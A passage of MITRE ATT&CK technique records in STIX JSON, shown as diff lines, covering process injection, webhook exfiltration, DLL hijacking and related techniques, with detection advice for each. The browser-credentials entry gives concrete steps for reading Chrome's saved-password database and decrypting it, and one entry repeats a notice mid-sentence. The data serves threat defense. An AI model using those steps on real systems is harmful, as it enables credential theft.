"source_name": "Kaspersky Encyclopedia MiTM", + "description": "Kaspersky IT Encyclopedia. (n.d.). Man-in-the-middle attack. Retrieved September 1, 2023.", + "url": "https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/" + }, + { + "source_name": "Kaspersky ManOnTheSide", + "description": "Starikova, A. (2023, February 14). Man-on-the-side – peculiar attack. Retrieved September 1, 2023.", + "url": "https://usa.kaspersky.com/blog/man-on-the-side/27854/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Process Injection", + "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Anastasios Pingios", + "Christiaan Beek, @ChristiaanBeek", + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "created": "2017-05-31T21:30:47.843Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055", + "external_id": "T1055" + }, + { + "source_name": "GNU Acct", + "description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.", + "url": "https://www.gnu.org/software/acct/" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "RHEL auditd", + "description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing" + }, + { + "source_name": "ArtOfMemoryForensics", + "description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017." + }, + { + "source_name": "Microsoft Sysmon v6 May 2017", + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon" + }, + { + "source_name": "Chokepoint preload rootkits", + "description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.", + "url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-12T05:22:59.079Z", + "name": "Exfiltration Over Webhook", + "description": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. \n\nAdversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)\n\nAccess to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Yossi Weizman, Microsoft Threat Intelligence", + "Sunders Bruskin, Microsoft Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "SaaS", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "created": "2023-07-20T15:30:55.763Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1567/004", + "external_id": "T1567.004" + }, + { + "source_name": "Checkmarx Webhooks", + "description": " Jossef Harush Kadouri. (2022, March 7). Webhook Party — Malicious packages caught exfiltrating data via legit webhook services. Retrieved July 20, 2023.", + "url": "https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191" + }, + { + "source_name": "CyberArk Labs Discord", + "description": "CyberArk Labs. (2023, April 13). The (Not so) Secret War on Discord. Retrieved July 20, 2023.", + "url": "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord" + }, + { + "source_name": "Discord Intro to Webhooks", + "description": "D. (n.d.). Intro to Webhooks. Retrieved July 20, 2023.", + "url": "https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks" + }, + { + "source_name": "Microsoft SQL Server", + "description": "Microsoft Threat Intelligence. (2023, October 3). Defending new vectors: Threat actors attempt SQL Server to cloud lateral movement. Retrieved October 3, 2023.", + "url": "https://www.microsoft.com/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/" + }, + { + "source_name": "Talos Discord Webhook Abuse", + "description": "Nick Biasini, Edmund Brumaghin, Chris Neal, and Paul Eubanks. (2021, April 7). https://blog.talosintelligence.com/collab-app-abuse/. Retrieved July 20, 2023.", + "url": "https://blog.talosintelligence.com/collab-app-abuse/" + }, + { + "source_name": "Push Security SaaS Attacks Repository Webhooks", + "description": "Push Security. (2023, July 31). Webhooks. Retrieved August 4, 2023.", + "url": "https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md" + }, + { + "source_name": "RedHat Webhooks", + "description": "RedHat. (2022, June 1). What is a webhook?. Retrieved July 20, 2023.", + "url": "https://www.redhat.com/en/topics/automation/what-is-a-webhook" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Bash History", + "description": "Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--44dca04b-808d-46ca-b25f-d85236d4b9f8", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1139", + "external_id": "T1139" + }, + { + "source_name": "External to DA, the OS X Way", + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Traffic Signaling", + "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Tony Lee", + "Josh Day, Gigamon" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.\n\nThe Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Defensive network service scanning" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205", + "external_id": "T1205" + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" + }, + { + "source_name": "AMD Magic Packet", + "description": "AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.", + "url": "https://www.amd.com/system/files/TechDocs/20213.pdf" + }, + { + "source_name": "Mandiant - Synful Knock", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.", + "url": "https://www.mandiant.com/resources/synful-knock-acis" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Hartrell cd00r 2002", + "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", + "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "GitLab WakeOnLAN", + "description": "Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.", + "url": "https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-27T18:32:11.219Z", + "name": "Direct Cloud VM Connections", + "description": "Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).\n\nMethods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. \n\nAdversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Thanabodi Phrakhun, @naikordian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", + "created": "2023-06-02T15:27:55.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/008", + "external_id": "T1021.008" + }, + { + "source_name": "EC2 Instance Connect", + "description": "AWS. (2023, June 2). Connect using EC2 Instance Connect. Retrieved June 2, 2023.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html" + }, + { + "source_name": "AWS System Manager", + "description": "AWS. (2023, June 2). What is AWS System Manager?. Retrieved June 2, 2023.", + "url": "https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html" + }, + { + "source_name": "lucr-3: Getting SaaS-y in the cloud", + "description": "Ian Ahl. (2023, September 20). LUCR-3: Scattered Spider Getting SaaS-y In The Cloud. Retrieved September 20, 2023.", + "url": "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud" + }, + { + "source_name": "SIM Swapping and Abuse of the Microsoft Azure Serial Console", + "description": "Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.", + "url": "https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial" + }, + { + "source_name": "Azure Serial Console", + "description": "Microsoft. (2022, October 17). Azure Serial Console. Retrieved June 2, 2023.", + "url": "https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Credentials from Web Browsers", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018) \n\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ryan Benson, Exabeam", + "Barry Shteiman, Exabeam", + "Sylvain Gil, Exabeam", + "RedHuntLabs, @redhuntlabs" + ], + "x_mitre_detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4579d9c9-d5b9-45e0-9848-0104637b579f", + "created": "2019-06-17T19:34:51.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1503", + "external_id": "T1503" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Microsoft CryptUnprotectData April 2018", + "description": "Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata" + }, + { + "source_name": "Proofpoint Vega Credential Stealer May 2018", + "description": "Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign" + }, + { + "source_name": "FireEye HawkEye Malware July 2017", + "description": "Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html" + }, + { + "source_name": "GitHub Mimikittenz July 2016", + "description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.", + "url": "https://github.com/putterpanda/mimikittenz" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T16:25:43.150Z", + "name": "System Binary Proxy Execution", + "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Nishan Maharjan, @loki248", + "Hans Christoffer Gaardløs", + "Praetorian", + "Wes Hurd" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "3.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control", + "Digital Certificate Validation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218", + "external_id": "T1218" + }, + { + "source_name": "GTFO split", + "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.", + "url": "https://gtfobins.github.io/gtfobins/split/" + }, + { + "source_name": "LOLBAS Project", + "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", + "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria" + }, + { + "source_name": "split man page", + "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.", + "url": "https://man7.org/linux/man-pages/man1/split.1.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Source", + "description": "**This technique has been deprecated and should no longer be used.**\n\nThe source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways source /path/to/filename [arguments] or .**This technique has been deprecated and should no longer be used.** /path/to/filename [arguments]. Take note of the space after the \".\". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.(Citation: Source Manual)\n\nAdversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1153", + "external_id": "T1153" + }, + { + "source_name": "Source Manual", + "description": "ss64. (n.d.). Source or Dot Operator. Retrieved May 21, 2019.", + "url": "https://ss64.com/bash/source.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "DLL Search Order Hijacking", + "description": "Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. \n\nAdversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. \n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\n\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": 